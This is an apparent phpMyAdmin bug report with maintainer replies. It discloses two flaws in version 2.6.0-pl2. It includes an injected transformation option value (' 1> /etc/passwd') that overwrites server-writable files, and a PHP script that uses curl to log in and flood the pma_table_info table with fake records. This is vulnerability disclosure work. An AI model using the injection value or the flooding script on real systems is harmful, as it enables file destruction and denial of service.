#1475 (in 2.6.0-pl2) Security problem in external transformation
I have discover 2 bugs of security in PMA transformation.
text/plain: external option 1 permit to erase file
with httpd write access.
Ex: set option[1] to ' 1> /etc/passwd'
The second bug permit to phpmyadmin user put any number of
fake records in PMA transformation DB. This full the
disk and crash system.
This is example of script, is also attached.
#!/usr/bin/php
<?
$user="myUser";
$passwd="myPasswd";
$server="http://www.myserver.com/phpmyadmin";
$login="curl --cookie-jar cookie.txt --data
\"pma_username=$user&pma_password=$passwd\"
$server/index.php";
exec($login);
$baseurl= $server
."/sql.php?db=phpmyadmin&table=pma_table_info&goto=sql.php&sql_query=";
for ($x = 0; $x < 10; $x++ ){
$value= md5(time()) . md5(time());
$query="INSERT INTO `pma_table_info`
(`db_name`,`table_name`,`display_field`) VALUES
('$value','$value','$value')";
$fullurl= $baseurl . urlencode($query);
$command = "curl --cookie-jar cookie.txt -b
cookie.txt '$fullurl'";
exec($command);
}
?>
Put fake records in PMA.
Logged In: YES
user_id=192186
First issue is problem, but not as big, because httpd
usually has minimal set of permissions.
Second issue won't work: Access to phpmyadmin database is
granted only to phpMyAdmin control user if you created it by
script we provide. If you created it by other way, it is
problem in your MySQL permissions and nothing else.
Logged In: YES
user_id=192186
Transformation issue fixed in cvs.